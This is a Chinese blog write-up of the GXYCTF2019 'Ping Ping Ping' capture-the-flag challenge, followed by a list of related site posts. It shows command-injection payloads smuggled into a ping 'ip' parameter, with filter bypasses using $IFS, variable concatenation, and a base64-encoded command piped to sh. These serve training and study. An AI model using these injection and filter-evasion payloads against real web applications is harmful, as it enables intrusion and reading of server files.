[GXYCTF2019]Ping Ping Ping(命令执行)

最新推荐文章于 2024-06-03 10:50:52 发布
最新推荐文章于 2024-06-03 10:50:52 发布
阅读量705 收藏 1
点赞数 1
分类专栏: CTF刷题 文章标签: ctf 刷题 buu 代码执行
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mafucan/article/details/125400359
版权

命令执行绕过

常见写法

127.0.0.1&&+code 只有在 && 左边的命令返回真(命令返回值 $? == 0),&& 右边的命令才 会被执行。

127.0.0.1&+code &表示将任务置于后台执行

127.0.0.1||+code 只有在 || 左边的命令返回假(命令返回值 $? == 1),|| 右边的命令才 会被执行。

127.0.0.1|+code | 表示管道,上一条命令的输出,作为下一条命令的参数 1

27.0.0.1;+code 多行语句用换行区分代码快,单行语句一般要用到分号来区分代码块

1、 | 通配符

直接输出下一条语句

?ip=127.0.0.1|ls

需要找到flag.php,但是index.php应该是过滤规则

?ip=127.0.0.1|cat flag.php ,cat显示

空格绕过方式

$IFS ${IFS} $IFS$1 //可以是任意数字 < <> {cat,flag.php} %20 %09 {cat,flag.txt} cat${IFS}flag.txt cat$IFS$9flag.txt cat$IFS$1flag.txt cat<flag.txt %09替换 cat<>flag.txt kg=$'\x20flag.txt'&&cat$kg (\x20转换成字符串就是空格,这里通过变量的方式巧妙绕过)

?ip=127.0.0.1|cat$IFS$21index.php

查看规则

符号,空格,bash,以及flag内容都被ban

方法1 变量拼接

让a=ag,b=fl拼接出flag

?ip=127.0.0.1;a=ag;b=fl;cat$IFS$9$b$a.php

?ip=127.0.0.1;b=ag;cat$IFS$21fl$b.php

变量拼接也是绕过正则过滤的一个有效的方法。查看F12获取flag

方法2 base64编码

过滤掉的关键词进行base65编码来绕过正则,再使用linux命令将编码解读成我们要执行的命令。我们可以将cat flag.php进行base64编码,再用base -d命令解码。

echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh

管道符后面为直接的语句

单双引号绕过

虽然这一题单双引号被ban了,但是也是一个不错的绕过姿势。使用单双引号进行拼接,比如

ca""t还有fl''ag等。在linux中,读取到没有特使含义的单双引号就会被当作空格处理。

反斜线绕过

大同小异

ca\t fl\ag

参考文章

GXYCTF 2019 | 题目解析之Ping Ping Ping - FreeBuf网络安全行业门户

[GXYCTF2019]Ping Ping Ping_没事就逛博客的博客-CSDN博客

[GXYCTF 2019]Ping Ping Ping_XiLitter的博客-CSDN博客

命令执行漏洞利用及绕过方式总结 - ghtwf01 - ghtwf01

mafucan
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[GXYCTF2019]Ping Ping Ping1
weixin_61021815的博客
05-14 1616
进入页面没有什么东西,尝试填一下ip 可以 使用多命令执行符 ; 无论逻辑 && 命令1正确则命令2执行命令1错误则命令2不执行 || 命令1错误命令2执行命令2错误则命令1执行 构造?ip=127.0.0.1 ;ls 构造?ip=127.0.0.1;cat flag.php 发现存在过滤 空格 想办法绕过一下 1.${IFS} 2.$IFS$1 3.${IFS 4.%20 5.<和<>重定向符替换 6.%09替换 注:...
buuctf[GXYCTF2019]Ping Ping Ping
hintll的博客
03-21 5090
buuctf[GXYCTF2019]Ping Ping Ping 这个题目的标题是pingping盲猜是关于命令执行的题目 打开环境后 只有一个/ip=? 应该是提示用get的方式来传参一个地址执行ping的操作 直接ping127.0.0.1 回显ping127.0.0.1的数据 说明是一道命令执行的题目 执行:?ip=127.0.0.1|ls 其中|的作用是命令分隔符 还有相关的符号 ; --在 shell 中,是”连续指令” & --不管第一条命令成功与否,都会执行第二条命令 &
命令执行
weixin_43940853的博客
08-19 142
http://198.13.45.199:5005/index.php https://blog.csdn.net/qq_26187985/article/details/89046386 注意对空格的取代是${IFS} (此题适用于命令执行的对一些字段过滤的题型) 一上来进行目录的ls ...
[GXYCTF 2019]Ping Ping Ping
m0_62422842的博客
05-08 7916
前言 最近在学习ssrf漏洞,这个漏洞的综合性还是挺强的。在网上看了大佬的文章总结的很详细。在此基础就通过实践相结合,更加深入的理解ssrf的具体操作。 SSRF漏洞 有一些函数比如
CTF中的命令执行绕过方式
2401_84466223的博客
06-03 780
cat $b$a绕过空格就用上面提到的$IFS$1完整的payload 1;shell 提供了 && 和 || 来实现命令执行控制的功能,shell 将根据 && 或 || 前面命令的返回值来控制其后面命令执行。连续使用管道意味着第一个命令的输出会作为 第二个命令的输入,第二个命令的输出又会作为第三个命令的输入,依此类推。默认情况下,进程是前台进程,这时就把Shell给占据了,我们无法进行其他操作,对于那些没有交互的进程,很多时候,我们希望将其在后台启动,可以在启动参数的时候加一个'&'实现这个目的。
[GXYCTF2019]Ping Ping Ping
qq_37466661的博客
08-27 3364
[GXYCTF2019]Ping Ping Ping CTF 命令执行
[GXYCTF2019]Ping Ping Ping (文件执行漏洞)
weixin_59233715的博客
12-13 1510
通过回显我们可以知道在当前目录有flag.php和index.php文件。管道符,上一条命令的输出,作为下一条命令的参数(显示后面的执行结果)比如我们想执行 cat flag.php但对方过滤了flag字符串。前面的语句为假则直接出错,后面的也不执行,前面只能为真。这个的意思是匹配到按flag这个顺序的所有字符。这个的意思是匹配到按flag这个顺序的所有字符。1、命令联合执行(参考lunan0320)cat fla$a.php即可。当前面的执行出错时(为假)执行后面的。前面的执行执行后面的。
[GXYCTF2019]Ping Ping Ping 1
qq_43618536的博客
07-01 2389
BUUCTF的[GXYCTF2019]Ping Ping Ping
命令执行绕过 [GXYCTF2019]Ping Ping Ping1
m0_75178803的博客
10-10 819
在去年参加的第四届强网杯全国网络安全竞赛中,就遇到过命令执行漏洞绕过的题目 CTF解题-2020年强网杯参赛WriteUp(题目名称 “主动” ),当时采用了 base64 编码联合反引号、变量拼接两种方式绕过了 flag 关键字的过滤并读取了 flag 值:本文目的在于结合 BU_绕过空格过滤。所以cat$IFS$1`ls`也相当于cat falg.php;`` 反引号 cat$IFS$1`ls`cat $a$b.php。通过变量赋值,再进行拼接,即可进行绕过。
BUUCTF—[GXYCTF2019]Ping Ping Ping1
qq_57778984的博客
10-22 346
内联绕过就是将反引号内命令的输出结果作为另一个命令的输入来执行,比如系统对flag字符进行了过滤,但是单独使用ls命令时又会回显出index.php和flag.php文件,那么我们可以通过ls命令将index.php和flag.php作为输入,通过cat查看两个文件获取flag,而不用输入cat flag.php触发关键词。3.尝试在执行ping命令执行其他命令,用";连接两个命令时,第二个命令只有在第一个命令执行成功的情况下才会执行。连接两个命令时,第二个命令只有在第一个命令执行失败的情况下才会执行
BUUCTF [GXYCTF2019]Ping Ping Ping
m0_49025459的博客
04-30 697
题目 打开网站 就这么点东西,啥都没有,那么我们浅试一下 那我们ls一下将文件名都输出出来,我们用几种方式都可以输出文件名 ?ip=127.0.0.1|ls ?ip=127.0.0.1;ls ?ip=127.0.0.1||ls 这里都是用了Windows中的管道符命令 | 直接执行后面的语句,例如 ping 127.0.0.1|whoami ||如果前面执行的语句出错,才执行后面的语句,所以前面的语句必须为假,例如 ping 1||whoami &前面的...
Ping命令实现的扩充
09-27
实验内容:Ping命令实现的扩充,在给定的Ping程序的基础上做如下功能扩充: ? -h 显示帮助信息 ? -b 允许ping一个广播地址,只用于IPv4 ? -t 设置ttl值,只用于IPv4 ? -q 安静模式。不显示每个收到的包的分析结果,...
计算机Ping命令使用详解.docx
03-01
计算机Ping命令使用详解 计算机Ping命令是TCP/IP协议中的一个强大工具,用于检测网络的连通情况和分析网络速度。Ping命令的主要作用有三个方面: 1. 检测网络的连通情况和分析网络速度:Ping命令可以用来检测网络...
ping 命令-综合文档
05-24
3. **命令执行示例** - `ping www.yesky.com`:将尝试连接到www.yesky.com的服务器,返回其IP地址(如210.77.155.200)以及往返时间等信息。 4. **结果解析** - `Pinging [目标IP] with 32 bytes of data`: 表示...
带参数的ping命令的实现
12-01
环境:在虚拟机上安装,ubuntu内容:里面包含完整的代码实现,可直接运行,包含完整的课设报告。
ping命令.docx
06-25
ping命令.docx
[毕业设计]VB环境下电脑销售与财务管理系统开发(ACCESS+源代码+论文).zip
08-05
[毕业设计]VB环境下电脑销售与财务管理系统开发(ACCESS+源代码+论文)
PPO(Proximal Policy Optimization,近端策略优化)算法
最新发布
08-05
在解答2024年华数杯全国大学生数学建模竞赛的C题“老外游中国”时,虽然PPO(Proximal Policy Optimization,近端策略优化)算法主要是应用于强化学习领域,特别是在解决连续动作空间的策略优化问题上,但在此数学建模竞赛中,它并不直接适用于数据处理、综合评价或路径规划等任务。不过,我们可以从数据处理和决策优化的角度,类比强化学习中的一些思想来构思解题策略。 然而,对于本题而言,我们可以更侧重于数据分析、综合评价模型(如层次分析法AHP、TOPSIS、模糊综合评价等)和路径规划算法(如Dijkstra、A*、遗传算法等)来解决问题。以下是对各个问题的进一步建模思路: 一、问题1建模思路 1.1 数据处理与分析 数据收集与清洗:首先,需要加载所有352个城市的CSV文件,对每个城市的100个景点信息进行数据清洗,去除无效或缺失的关键信息(如评分缺失的景点)。 最高分查找:遍历所有景点,找到最高评分(BS),并统计获评该评分的景点数量。 城市排名:统计每个城市获评BS的景点数量,并根据数量多少进行排序,列出前10个城市。 二、问题2建模思路 2.1 综合评价体系构建
中国城市统计年鉴(1985-2023)
08-05
《中国城市统计年鉴》是全面反映中国城市社会经济发展情况的资料性年刊。《中国城市统计年鉴—2023》收录了2022年全国各级城市社会经济发展等方面的主要统计数据。 本年鉴内容共分四个部分: 第一部分是全国城市行政区划,列有不同区域、不同级别的城市分布情况; 第二、三部分分别是地级以上城市统计资料和县级城市统计资料,具体包括人口、资源环境、经济发展、科技创新、人民生活、公共服务、等方面的数据; 第四部分是附录,为主要统计指标解释。 需要说明的是,从1997年开始,地级以上城市和县级城市分别采用不同的统计制度,有些指标在两类城市之间不具有可比性,故本年鉴将地级以上城市和县级城市统计资料分为独立的两部分。本年鉴所涉及的全国或全部城市统计资料,均未包括香港特别行政区、澳门特别行政区和台湾省。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值